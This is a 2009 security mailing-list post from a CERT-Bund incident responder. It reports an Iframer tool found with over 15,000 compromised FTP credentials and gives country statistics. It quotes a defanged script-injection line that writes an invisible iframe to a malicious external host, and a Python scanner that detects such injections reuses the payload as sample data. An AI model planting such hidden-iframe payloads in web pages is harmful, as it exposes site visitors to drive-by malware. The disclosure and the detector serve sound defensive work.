[nsp-sec] Compromised ftp accounts
Thomas Hungenberg
th.lab at hungenberg.net
Tue Aug 25 06:52:02 EDT 2009
The gzip'ed attachment did not make it to the list, so I'm sending the list
again uncompressed.
- Thomas
CERT-Bund Incident Response & Anti-Malware Team
Thomas Hungenberg wrote:
> Hi teams,
>
> I've come across an Iframer installation along with a list of 15.000+ ftp credentials.
>
> The Iframer tool most probably recently tried to inject this line (remove 'XXX'):
> <scrXXXipt>document.write(\'<ifrXXXame src=\"htXXXtp://sexyy.ru/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></ifrXXXame>\');</scrXXXipt>
>
> Please find attached a sanitized list (pw removed) of the compromised ftp accounts.
> Format: ASN | IP | CC | ftp username | AS name
>
> Top 10 country codes:
>
> 5240 US
> 1263 RU
> 1187 DE
> 882 EU
> 803 TR
> 720 CZ
> 674 FR
> 655 PL
> 564 HU
> 475 NL
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
>
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: ftp_asn.txt
URL: <https://puck.nether.net/mailman/private/nsp-security/attachments/20090825/645c4591/attachment-0001.txt>
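For operators checking web space behind accounts on the list, a minimal scanner for the kind of line quoted in the message: a script that uses document.write to emit an invisible iframe. This is an added example, not part of the original message or the attached list; the function names, the file extensions scanned and the injected.example host are assumptions.

```python
import os
import re
import sys

# document.write() emitting an <iframe>; quotes may be backslash-escaped,
# as in the line quoted in the message.
WRITE_IFRAME = re.compile(
    r"""<script[^>]*>\s*document\.write\s*\(\s*\\?["']\s*(<iframe\b.*?>)""",
    re.IGNORECASE | re.DOTALL)
ATTR = re.compile(r"""([\w-]+)\s*=\s*\\?["'](.*?)\\?["']""", re.DOTALL)
WEB_EXT = (".html", ".htm", ".php", ".js", ".tpl")  # assumed file types


def hidden_iframe_writes(text):
    """Return [(src, [reasons])] for script-written iframes that are invisible."""
    hits = []
    for m in WRITE_IFRAME.finditer(text):
        attrs = {k.lower(): v.strip() for k, v in ATTR.findall(m.group(1))}
        style = attrs.get("style", "").lower().replace(" ", "")
        reasons = [f"{dim}=0" for dim in ("width", "height")
                   if attrs.get(dim, "").lower().rstrip("px") == "0"]
        reasons += [rule for rule in ("display:none", "visibility:hidden")
                    if rule in style]
        if reasons:  # a visible iframe written by script is not reported
            hits.append((attrs.get("src", ""), reasons))
    return hits


def scan_tree(root):
    """Walk a web root and yield (path, src, reasons) for each finding."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for src, reasons in hidden_iframe_writes(fh.read()):
                        yield path, src, reasons


# Constructed samples; injected.example is a placeholder host.
ESCAPED = r"""<script>document.write(\'<iframe src=\"http://injected.example/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></iframe>\');</script>"""
PLAIN = '<script>document.write("<iframe src=\'http://injected.example/x\' height=\'0px\'></iframe>");</script>'
BENIGN = '<script>document.write("<iframe src=\'/map.html\' width=\'600\' height=\'400\'></iframe>");</script>'

if __name__ == "__main__":
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*finding, sep=" | ")
```

Run it with a web root as the only argument; each output line gives the file, the iframe source and the attributes that make it invisible.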